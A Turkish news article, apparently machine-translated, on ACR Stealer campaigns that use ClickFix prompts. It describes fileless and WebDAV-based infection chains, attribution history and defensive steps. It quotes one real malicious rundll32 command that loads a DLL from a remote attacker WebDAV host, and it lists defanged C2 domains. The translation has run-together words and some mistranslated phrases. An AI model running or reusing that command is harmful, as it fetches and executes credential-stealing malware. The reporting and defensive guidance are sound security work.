ACR Hırsızı2024'ten bu yana dolaşımda olan bir bilgi hırsızı, kayıtlı tarayıcı şifreleri, canlı oturum belirteçleri, PDF'ler, Microsoft 365 belgeleri ve senkronize edilmiş OneDrive ve SharePoint klasörlerindeki dosyalar ile kurumsal ağlardan çıkıyor.

Birisi Çalıştır kutusuna bir komut yapıştırıp Enter tuşuna bastığı için içeri giriyor. MicrosoftlaidPerşembe günü teslimat zincirlerinden ikisini dağıttım. Şirketin yönetilen tespit kolu olan Defender Experts ekibi, ACR Stealer etkinliğinin Nisan sonundan Haziran ortasına kadar müşteri ortamlarındaki yükselişini izledi ve kampanyaların "başarılı bir şekilde kullanıldığını" söyledi.ClickFix yemleritarayıcı kimlik bilgilerini, kimlik doğrulama belirteçlerini ve hassas belgeleri çalmak için."

Her iki zincir de aynı istemle açılır ve sonra bölünür: Biri diskte izler bırakır, diğeri neredeyse tamamen bellekte çalışır. Microsoft'un düzeltme kılavuzu, kurbanlara yalnızca parolaları döndürmek yerine belirteçleri de iptal etmelerini söylüyor.

Piksel cinsinden bir yük

Raporda, bu uyarının muhtemelen kötü amaçlı reklamlardan veya SEO ile oynanmış arama sonuçlarından geldiği belirtiliyor. Dosyasız zincir, yapıştırılan komut ortaya çıktığında başlarmshta.exeuzak HTA içeriğini çekmek için. Gömülü bir VBScript yükleyici, PowerShell'in kodunu çözmek ve başlatmak için COM nesnelerine dayanır; bu aşamada bir kurban kimliği basılır, sertifika doğrulaması devre dışı bırakılır ve bellekte alınan bilgiler çalıştırılır.

Aldığı şey, bir resim sunucusundan bir JPEG'dir;piksellerde oturan yük. Özel rutinler onu şekillendirir, şifresini çözer, sıkıştırmasını açar ve yansıtıcı bir şekilde yürütür. Daha sonra Chrome ve Edge için de geçerli,Login Data and Web Dataveritabanları ve çağırmaDPAPItuttukları şifrelerin, çerezlerin ve belirteçlerin şifresini çözmek için. Masaüstündeki ve İndirilenler bölümündeki PDF'ler de gider.

26 Mayıs'ta SANS Internet Storm Center yöneticisi Brad DuncanWindows enfeksiyonunu belgelediAnthropic'in yapay zeka asistanı Claude'un kimliğine bürünen, kötü amaçlı Google reklamları yoluyla ulaşılan ve genellikle arkasına gizlenen bir sayfanın izini sürdüsites.google.comURL'ler. Sayfa, Mac'te açıldığında macOS talimatlarını, Windows'ta açıldığında ise Windows talimatlarını sunuyordu.

Microsoft asla yemin adını vermez. Kampanya 2 tablosundaki göstergelerden ikisi,creativecommunityinfo[.]art and enhanceblabber[.]cc, bir yük ana bilgisayarı ve bir C2 olarak listelenir. Hacker News, her ikisini de Duncan'ın her yedi hafta önceki alt alan adlarında çalışan zinciriyle eşleştirdi ve Microsoft'un raporunda referanslar arasında Duncan'ın günlüğünden bahsediliyor.

Bu zincir ayrıca bir resim barındırma hizmeti olan ImgBB'den 628 KB JPEG aldı. Bunu enfeksiyonun bir parçası olarak işaretledi ve hiçbir sonuç elde edemedi: "Gömülü veriye dair belirgin bir işaret de bulamadım."

Kızıl KanaryaClaude markalı yemleri bir ay önce kaydetmiş ve ACR Stealer'ı GitLab'daki sahte Claude Code sayfaları aracılığıyla teslim etmişti:claude-desktop[.]gitlab[.]io.

Diğer zincir parmak izi bırakıyor

Microsoft'un ilk zinciri diske yazıyor, bu da savunucuların daha fazla çalışmasına neden oluyor. Yapıştırılan komut bir DLL dosyasını doğrudan bir dosyadan çeker.WebDAV paylaşımıHTTPS üzerinden, bir GUID dizini ve başka bir şey olarak iletilecek şekilde oluşturulmuş bir dosya adı kullanarak; raporun örneğigoogle.ct.

Red Canary, Microsoft'un raporundan haftalar önce, Nisan telemetrisine ait Mayıs raporunda aynı şekli yayınladı:

"C:\Windows\system32\rundll32.exe" \\sphere-api.dialectosphere.in[.]net\05fe317c-0981-4de2-bc8a-930d369db441\ck-3d80df5d12cdfe6450a782fc87bf66b444.google,#1

Defender Experts'in kullandığı üç değişkenden ikisipushdönce uzak paylaşımı geçici bir yerel sürücü olarak bağlamak, böylece yükün yerel bir yol gibi görünen bir yoldan geçmesini sağlamak. En gizli olanı bunu sararconhost.exe --headlesskonsol penceresini öldürmek ve dizeleri gizlemek içinpushd, rundll32ve gecikmeli ortam değişkeni genişletmesinin arkasındaki uzak ana bilgisayar.

Aşağıda gizlenmiş PowerShell var. Bir ZIP'i aşağıdaki klasöre bırakır%LocalAppData%\Tempzararsız bir isimle; Microsoft'un örneğiLogiOptionsPlus. Paketlenmişpythonw.exedaha sonra Python betiğini başlatır, böylece ekranda hiçbir şey yanıp sönmez. Yükleyici, yüklemeden önce eski kopyaları siler, bu da onu güncelleyici yapar.

Bir yazılım güncellemesi gibi davranan gizli bir zamanlanmış görev boyunca devam eder, zaman damgalarını kopyalarnotepad.exekendi dosyalarına kopyalar ve arkasındaki PowerShell geçmişini temizler. Son aşama bellekte kalır ve yürütmeyi Windows Fiber API aracılığıyla gerçekleştirir.

Bu izinsiz girişlerin bir alt kümesinde, ikinci bir Python yükleyicisi, halka açık blockchain RPC uç noktaları ve Web3 düğüm altyapısıyla konuşur ve büyük olasılıkla halka açık bir defterden bir veri yükünü veya bir C2 adresini çeker. Microsoft tekniği adlandırıyorEterGizleme: İşaretçiyi akıllı bir sözleşmeye koyun ve ele geçirilecek saldırgan kontrollü çözümleyici kalmaz.

Hata yok, numara yok

Her iki zincir de bir güvenlik açığından yararlanmıyor. Her ikisi de, oturum açmış kullanıcının zaten sahip olduğu şeyi tam olarak devralır ve aşağı yöndeki her katman, WebDAV montajı, piksel çıkarma, bellek içi aktarma, yalnızca kişi bir istemi okuyup Enter'a bastığında çalışır. Bu hikayede CVE yok. Yama işlemi, yapıştır ve çalıştır yolunu kaldırmaz.

Microsoft, yemlerin işe yaradığını söylüyor ancak bunu asla ölçmüyor. Raporda mağdur sayısı, etkilenen müşteri sayısı ve raporlanan artışa ilişkin bir temel bilgi yer almıyor.

Kızıl Kanarya'nın Nisan ayı telemetrisinde en azından rakamlar var.ClearFakeACR Stealer'ı en az Mart 2025'ten bu yana besleyen bir web enjeksiyon kümesi olan .

Küme, güvenliği ihlal edilmiş sitelere enjekte edilen JavaScript aracılığıyla yayın yapıyor ve Microsoft'un raporunda her iki zincirde de bundan bahsedilmiyor.

Bu kimin hırsızı?

Microsoft iddia ettiği şeyler konusunda dikkatlidir. Faaliyeti ACR Stealer'a, gözlemlenen davranışlar ve istismar sonrası ticari uygulamalarla ilişkilendiriyor, ailenin altyapısı hakkında kamuya açık olarak bilinenlerle karşılaştırılıyor ve hiçbir tehdit aktörünün adını vermiyor. Dikkat kazanıldı.

AcridRain olarak da yazılan ACR, Temmuz 2024'te satışları durduran SheldIO olarak bilinen bir aktör tarafından Rusça konuşulan forumlarda pazarlandı. Hesaplar daha sonra ne olacağı konusunda ikiye bölündü.eSentirekaynak kodunun satıldığını söylüyor. Proofpoint'in açıklaması farklı: Aynı Telegram kanalı, takıma veda değil, kapatma çağrısında bulundu ve Amatera paneli beş ay sonra ortaya çıktı.

Yeniden markalama konusunda aynı fikirdeler. Kanıt noktasıHaziran 2025'te rapor edildi"ACR Stealer önemli ölçüde güncellendi ve şu şekilde yeniden markalandı:Amatera HırsızıAylık 199 dolardan yıllık 1.499 dolara kadar fiyatlandırılıyor. Red Canary, ACR ve Amatera'yı tek bir aile olarak görüyor ve ACR'yi güncellenmiş bir GrMsk Hırsızı olarak değerlendiriyor.

Temmuz 2026'da ACR Stealer etiketli bir tespit, en az bir kez yeniden adlandırılmış ve sahiplerini değiştirmiş olabilecek bir kod tabanındaki davranışsal bir çağrıdır. Etiket kodu açıklar. Kimin yönettiğini söylemiyor.

Nerede durdurulmalı

Yukarıdaki her tekniğin yukarısında bir kontrol bulunur: hiçbir zincir, kullanıcı Çalıştır iletişim kutusuna bir komut yapıştırmadan çalışmaz.

  • Vektörü kesin. eSentire, Çalıştır istemini GPO yoluyla kaldırmanızı ve engellemenizi önerirmshta.exeAppLocker veya WDAC aracılığıyla.
  • Uygulama kontrolünü kullanın ve yüzey azaltma kurallarını kullanın; böylece PowerShell, Python,mshta.exe, Verundll32.exeinternet üzerinden teslim edilen içerik şu adresten başlatılamıyor:Downloads, Temp, or %LocalAppData%.
  • Hunt rundll32.exeRed Canary'nin bu aile için tespit fırsatı olan, ağ bağlantısı yaparken hiçbir komut satırı parametresi olmadan çalışması. Yazılım güncellemeleri, zaman damgalama ve PowerShell geçmişini temizleme gibi görünen zamanlanmış görevler ekleyin.
  • Şüpheli bir ana bilgisayarda kimlik bilgilerini izole edin, döndürün, belirteçleri iptal edin ve uzak paylaşımlara ve görüntü barındırma hizmetlerine giden bağlantıları kontrol edin.

Microsoft, raporla birlikte üç Defender XDR arama sorgusu ve 16 kampanya alanı gönderdi.

Bu göstergeler bir kesittir ve rapor şunu belirtmektedir: ailenin tümünü değil, temsili niteliktedir ve muhtemelen daha fazla kampanya ve altyapı aktiftir. Etki alanları dönüşümlü olarak çalışır. Ön taraftaki sorma işe yaramıyor çünkü işe yarıyor. Yemler birbirinin yerine geçmek yerine örtüşüyor: Red Canary, aynı Nisan telemetrisinde sahte CAPTCHA'lar ve sahte Claude sayfaları gördü.

Bu makaleyi ilginç buldunuz mu? Bizi takip edinGoogle Haberler, heyecan and LinkedInyayınladığımız daha özel içeriği okumak için.